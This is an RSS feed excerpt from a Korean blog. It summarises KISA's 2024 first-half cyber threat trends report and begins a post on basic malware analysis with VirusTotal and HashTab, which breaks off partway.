&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;color: #3c3c3c; text-align: center;&quot;&gt;- 한국인터넷진흥원&lt;/span&gt;&lt;span style=&quot;color: #3c3c3c; text-align: center;&quot;&gt;(KISA)에서 발간 보고서&lt;/span&gt;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;538&quot; data-origin-height=&quot;735&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bOI3hW/btsLw6tMX7q/s5tL2TeTjDRfUKk2sXZqMk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bOI3hW/btsLw6tMX7q/s5tL2TeTjDRfUKk2sXZqMk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bOI3hW/btsLw6tMX7q/s5tL2TeTjDRfUKk2sXZqMk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbOI3hW%2FbtsLw6tMX7q%2Fs5tL2TeTjDRfUKk2sXZqMk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;538&quot; height=&quot;735&quot; data-origin-width=&quot;538&quot; data-origin-height=&quot;735&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h3 style=&quot;text-align: center;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;Part1. 사이버 위협 동향&lt;/b&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1-1. 침해사고 신고 현황&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;661&quot; data-origin-height=&quot;195&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bdyLiU/btsLwt3ZgBV/pLaX6DmdI29bmXd88tHIO0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bdyLiU/btsLwt3ZgBV/pLaX6DmdI29bmXd88tHIO0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bdyLiU/btsLwt3ZgBV/pLaX6DmdI29bmXd88tHIO0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbdyLiU%2FbtsLwt3ZgBV%2FpLaX6DmdI29bmXd88tHIO0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;661&quot; height=&quot;195&quot; data-origin-width=&quot;661&quot; data-origin-height=&quot;195&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;708&quot; data-origin-height=&quot;282&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/O9pB5/btsLxjfjzc5/bp4u8LuO9K28BKo1oyckBk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/O9pB5/btsLxjfjzc5/bp4u8LuO9K28BKo1oyckBk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/O9pB5/btsLxjfjzc5/bp4u8LuO9K28BKo1oyckBk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FO9pB5%2FbtsLxjfjzc5%2Fbp4u8LuO9K28BKo1oyckBk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;708&quot; height=&quot;282&quot; data-origin-width=&quot;708&quot; data-origin-height=&quot;282&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1-2. 사이버 위협 분석&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;714&quot; data-origin-height=&quot;338&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/qftVv/btsLyE3XIkB/29ihvy9ve85MlOEqsnpDlk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/qftVv/btsLyE3XIkB/29ihvy9ve85MlOEqsnpDlk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/qftVv/btsLyE3XIkB/29ihvy9ve85MlOEqsnpDlk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FqftVv%2FbtsLyE3XIkB%2F29ihvy9ve85MlOEqsnpDlk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;714&quot; height=&quot;338&quot; data-origin-width=&quot;714&quot; data-origin-height=&quot;338&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1) 블록체인 개발업체 가상자산 유출 - 취약한 계정관리와 피싱메일을 통한 무차별적인 가상자산탈취공격&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2) 공유기 악성코드 감염으로 인터넷망 장애 - 1월초 지역 인터넷케이블사업자의 서비스 구역에서 알 수 없는 원인으로 주말 동안 약4시간 가량 인터넷 접속 장애가 발생. 원인은 비정상 트래픽을 유발한 가입자 공유기가 사고 원인이였음. 인터넷 공유기나 NAS 등 IoT기기는 미라이(Mirai) 보 감염으로 인한 서비스 장애나 해킹 경유지로 악용 될 수 있음.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;3) 미상 해커그룹 니옌, 과시 목적의 취약한 국내 홈페이지 해킹 공격 지속&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;4) 중국 IT기업으로 위장합 정부지원 해킹조직의 실체 - 아이순(i-Soon)이라는 중국 해킹단체&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;5) 금융대출사기 등으로 악용되는 알뜰폰 부정개통 사고 - 비대면 개통과정에서 부정개통이 이뤄지는 사고 발생. 보인확인 우회 취약점을 이용&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;6) 주요 기업 내부에 침투를 위한 오픈소스 SW 공급망 해킹 위협 - 신뢰에 기반하여 악성코드 삽입&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;643&quot; data-origin-height=&quot;279&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/3jnDZ/btsLxZHpDbf/ffngdpOnk184wLclFlK0e0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/3jnDZ/btsLxZHpDbf/ffngdpOnk184wLclFlK0e0/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/3jnDZ/btsLxZHpDbf/ffngdpOnk184wLclFlK0e0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F3jnDZ%2FbtsLxZHpDbf%2FffngdpOnk184wLclFlK0e0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;643&quot; height=&quot;279&quot; data-origin-width=&quot;643&quot; data-origin-height=&quot;279&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;7) 스미싱, 투자&amp;nbsp; 유도 사기 등 서민경제를 위협하는 스팸문자 급증 - 원인 1. 해외 서비스를 이용한 스팸발생 증가, 윈인 2. 웹페이지 취약점을 악용하여 해당 서버에 저장된 개인정볼르 확보한 목표를 대상으로 대량문자 발송.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp; * 문자발송시스템에 침입하기 위해 자주 악용되는 공격 기법으로는&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;▲파일 업로드 페이지에서 파일 확장자 미검증 등 취약점을 이용해 공격자가 웹셸(백도어 악성코드)을 서버에 업로드하고 실행하는 방식,&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;▲SQL 인젝션 취약점을 악용한 비정상 질의 공격 방식&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;▲추측 가능하거나 쉬운 관리자 계정을 비밀번호 대입공격으로 획득하는 방식 등이 있다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;8) 랜섬웨어 공격의 기본, 피해 기업 자료를 공개하는 2차 피해증가&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1-3. 사이버 위협 전망&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;1) 코인가치 상승에 따른 거래소 및 개인 대상 가상자산 탈취공격 지속&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2) 기업의 내부 보안 강화를 우회하기 위한 SW 공급망 공격 지속&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;3) 파리 하계 올림픽, 미 대선 이슈 등을 악용한 피싱 공격 지속&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h3 style=&quot;text-align: center;&quot; data-ke-size=&quot;size23&quot;&gt;&lt;b&gt;Part2. 전문가 칼럼&lt;/b&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2-1.&amp;nbsp; KISA 이태승 연구위원&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;: &amp;rsquo;24.8.14 시행 정보통신망법의 주요 개정내용과 의의&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2-2. 법무법인(유한) 태평양 윤주호 변호사&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;: 가상자산 이용자 보호법, 사업자가 고려하여야 할 사항&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2-3. 프라이빗테크놀로지 김영랑 대표&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;: 핵심 기술 융합과 실증 사례를 통해 살펴보는 제로 트러스트 전략&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2-4. 한남대학교 이만희 교수&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;: SW 공급망 보안 가이드라인(1.0) 소개 및 발전 방향&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2-5. S2W TALON&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;: 랜섬웨어 그룹의 주요 동향 및 위험도 평가&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2-6. AWS 신은수 보안기술총괄&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;: 안전한 클라우드 서비스 이용을 통한 정보유출 방지&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2-7. 넥슨코리아 김동춘 실장&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;: 생성형 AI를 활용한 보안업무 혁신&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style1&quot; /&gt;
&lt;p&gt;&lt;figure class=&quot;fileblock&quot; data-ke-align=&quot;alignCenter&quot;&gt;&lt;a href=&quot;https://blog.kakaocdn.net/dn/nG2mN/btsLw10gfBD/vxUdZogsWbYEbtelkHlku0/2024%EB%85%84%20%EC%83%81%EB%B0%98%EA%B8%B0%20%EC%82%AC%EC%9D%B4%EB%B2%84%20%EC%9C%84%ED%98%91%20%EB%8F%99%ED%96%A5%20%EB%B3%B4%EA%B3%A0%EC%84%9C.pdf?attach=1&amp;amp;knm=tfile.pdf&quot; class=&quot;&quot;&gt;
    &lt;div class=&quot;image&quot;&gt;&lt;/div&gt;
    &lt;div class=&quot;desc&quot;&gt;&lt;div class=&quot;filename&quot;&gt;&lt;span class=&quot;name&quot;&gt;2024년 상반기 사이버 위협 동향 보고서.pdf&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;size&quot;&gt;7.56MB&lt;/div&gt;
&lt;/div&gt;
  &lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;출처 : &lt;a href=&quot;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=1&amp;amp;bbsId=B0000127&amp;amp;searchWrd=&amp;amp;menuNo=205021&amp;amp;pageIndex=2&amp;amp;categoryCode=&amp;amp;nttId=71503&quot; target=&quot;_blank&quot; rel=&quot;noopener&amp;nbsp;noreferrer&quot;&gt;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=1&amp;amp;bbsId=B0000127&amp;amp;searchWrd=&amp;amp;menuNo=205021&amp;amp;pageIndex=2&amp;amp;categoryCode=&amp;amp;nttId=71503&lt;/a&gt;&lt;/p&gt;
&lt;figure id=&quot;og_1735048651408&quot; contenteditable=&quot;false&quot; data-ke-type=&quot;opengraph&quot; data-ke-align=&quot;alignCenter&quot; data-og-type=&quot;website&quot; data-og-title=&quot;KISA 보호나라&amp;amp;KrCERT/CC&quot; data-og-description=&quot;KISA 보호나라&amp;amp;KrCERT/CC&quot; data-og-host=&quot;www.boho.or.kr&quot; data-og-source-url=&quot;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=1&amp;amp;bbsId=B0000127&amp;amp;searchWrd=&amp;amp;menuNo=205021&amp;amp;pageIndex=2&amp;amp;categoryCode=&amp;amp;nttId=71503&quot; data-og-url=&quot;http://www.boho.or.kr:80&quot; data-og-image=&quot;https://scrap.kakaocdn.net/dn/qKPd2/hyXOcPLG6R/FAxKCE57n4u4xuiIdPRxe0/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/ipu0f/hyXSyjlIk7/X06JKpMYdKr3kivKkPtIE0/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/zPXWo/hyXSERoH3w/h8KLwIIIhcSIbwvSk206S0/img.jpg?width=1098&amp;amp;height=328&amp;amp;face=0_0_1098_328&quot;&gt;&lt;a href=&quot;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=1&amp;amp;bbsId=B0000127&amp;amp;searchWrd=&amp;amp;menuNo=205021&amp;amp;pageIndex=2&amp;amp;categoryCode=&amp;amp;nttId=71503&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot; data-source-url=&quot;https://www.boho.or.kr/kr/bbs/view.do?searchCnd=1&amp;amp;bbsId=B0000127&amp;amp;searchWrd=&amp;amp;menuNo=205021&amp;amp;pageIndex=2&amp;amp;categoryCode=&amp;amp;nttId=71503&quot;&gt;
&lt;div class=&quot;og-image&quot; style=&quot;background-image: url('https://scrap.kakaocdn.net/dn/qKPd2/hyXOcPLG6R/FAxKCE57n4u4xuiIdPRxe0/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/ipu0f/hyXSyjlIk7/X06JKpMYdKr3kivKkPtIE0/img.png?width=270&amp;amp;height=270&amp;amp;face=0_0_270_270,https://scrap.kakaocdn.net/dn/zPXWo/hyXSERoH3w/h8KLwIIIhcSIbwvSk206S0/img.jpg?width=1098&amp;amp;height=328&amp;amp;face=0_0_1098_328');&quot;&gt;&amp;nbsp;&lt;/div&gt;
&lt;div class=&quot;og-text&quot;&gt;
&lt;p class=&quot;og-title&quot; data-ke-size=&quot;size16&quot;&gt;KISA 보호나라&amp;amp;KrCERT/CC&lt;/p&gt;
&lt;p class=&quot;og-desc&quot; data-ke-size=&quot;size16&quot;&gt;KISA 보호나라&amp;amp;KrCERT/CC&lt;/p&gt;
&lt;p class=&quot;og-host&quot; data-ke-size=&quot;size16&quot;&gt;www.boho.or.kr&lt;/p&gt;
&lt;/div&gt;
&lt;/a&gt;&lt;/figure&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>[IT 및 보안]  /[IT 및 보안] 보고서  </category>
      <author>제나나</author>
      <guid isPermaLink="true">https://jennana.tistory.com/650</guid>
      <comments>https://jennana.tistory.com/650#entry650comment</comments>
      <pubDate>Tue, 24 Dec 2024 23:11:10 +0900</pubDate>
    </item>
    <item>
      <title>악성코드 분석방법</title>
      <link>https://jennana.tistory.com/649</link>
      <description>&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style5&quot; /&gt;
&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;악성코드를 분석하는 방법&lt;/b&gt;&lt;/h2&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style7&quot; /&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;1. &lt;b&gt;초기분석 (기초 정적 분석)&lt;/b&gt;&lt;br /&gt;- 실행하지 않고 분석&lt;br /&gt;-직관적이며 신속히 수행&lt;br /&gt;&lt;br /&gt;2. &lt;b&gt;동적분석&lt;/b&gt;&lt;br /&gt;- 프로그램을 실행하고 분석&lt;br /&gt;&lt;br /&gt;3. &lt;b&gt;정적분석&lt;/b&gt;&lt;br /&gt;- 리버스 엔지니어링&lt;/p&gt;
&lt;hr data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;h2 style=&quot;text-align: center;&quot; data-ke-size=&quot;size26&quot;&gt;&lt;b&gt;1. 초기분석(초기 정적분석)&lt;/b&gt;&lt;/h2&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;악성코드를 실행하지 않고 분석하는 방법&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style3&quot; /&gt;
&lt;h2 style=&quot;text-align: left;&quot; data-ke-size=&quot;size26&quot;&gt; &lt;b&gt; 분석 방법&lt;/b&gt;&lt;/h2&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size18&quot;&gt;&lt;b&gt;1. 안티 바이러스 스캔 이용&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;✔ 사용 도구 : &lt;b&gt;virustotal[.]com, malwares[.]com &lt;/b&gt;사이트&lt;br /&gt;&lt;br /&gt;1) 바이러스 토탈 Virus Total&amp;nbsp;&amp;nbsp;(&lt;a href=&quot;http://www.virustotal.com)&quot;&gt;www.virustotal.com)&lt;/a&gt; &lt;br /&gt;이곳에서는 다양한 안티바이러스 엔진을 사용해서 파일을 분석해 준다.&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;여러 개의 안티바이러스 엔진으로 스캐닝 가능. 또한 악성코드에 대한 추가 정보 제공&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;846&quot; data-origin-height=&quot;747&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/nuP9d/btsFlUNAdKW/uXRCPxILd2nJBxpCec5toK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/nuP9d/btsFlUNAdKW/uXRCPxILd2nJBxpCec5toK/img.png&quot; data-alt=&quot;바이러스 토탈&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/nuP9d/btsFlUNAdKW/uXRCPxILd2nJBxpCec5toK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FnuP9d%2FbtsFlUNAdKW%2FuXRCPxILd2nJBxpCec5toK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;846&quot; height=&quot;747&quot; data-origin-width=&quot;846&quot; data-origin-height=&quot;747&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;바이러스 토탈&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;바이러스 걸린 파일을 업로드하면 아래처럼 전 세계의 안티 바이러스 엔진이 바이러스 여부를 알려준다,.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1014&quot; data-origin-height=&quot;976&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dPUeB1/btsFso7gmrj/qczhl1Jr0uBq9VaKxt04qK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dPUeB1/btsFso7gmrj/qczhl1Jr0uBq9VaKxt04qK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dPUeB1/btsFso7gmrj/qczhl1Jr0uBq9VaKxt04qK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdPUeB1%2FbtsFso7gmrj%2Fqczhl1Jr0uBq9VaKxt04qK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1014&quot; height=&quot;976&quot; data-origin-width=&quot;1014&quot; data-origin-height=&quot;976&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;2) 말웨어즈 (malwares.com)&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;악성코드 해시값,&amp;nbsp; URL, IP 등으로 검색가능&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;바이러스 토탈과 비슷한 역할을 한다.&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1014&quot; data-origin-height=&quot;976&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/CEIzO/btsFoaa61A8/QqfNjJpkoExNuieL5KovJ1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/CEIzO/btsFoaa61A8/QqfNjJpkoExNuieL5KovJ1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/CEIzO/btsFoaa61A8/QqfNjJpkoExNuieL5KovJ1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FCEIzO%2FbtsFoaa61A8%2FQqfNjJpkoExNuieL5KovJ1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1014&quot; height=&quot;976&quot; data-origin-width=&quot;1014&quot; data-origin-height=&quot;976&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size18&quot;&gt;&lt;br /&gt;&lt;b&gt;2. 해시값 확인&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;✔ 사용 도구 : &lt;b&gt;HashTab&lt;/b&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;파일의 해시값을 확일할 수 있는 도구&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;파일마다 고유의 해시값을 가지고 있기 때문에 동일한 파일은 해시값이 같지만, 악성코드에 감염되어서 파일이 일부 수정되었으면 다른 해시값을 가지기 때문에 악성코드에 감염되었다고 분석할 수 있다.&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;430&quot; data-origin-height=&quot;492&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/QLopl/btsFlONsUvt/Bz8jvwDh6nmgTh0RXCuO11/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/QLopl/btsFlONsUvt/Bz8jvwDh6nmgTh0RXCuO11/img.png&quot; data-alt=&quot;HashTab 확인&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/QLopl/btsFlONsUvt/Bz8jvwDh6nmgTh0RXCuO11/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FQLopl%2FbtsFlONsUvt%2FBz8jvwDh6nmgTh0RXCuO11%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;430&quot; height=&quot;492&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;430&quot; data-origin-height=&quot;492&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;HashTab 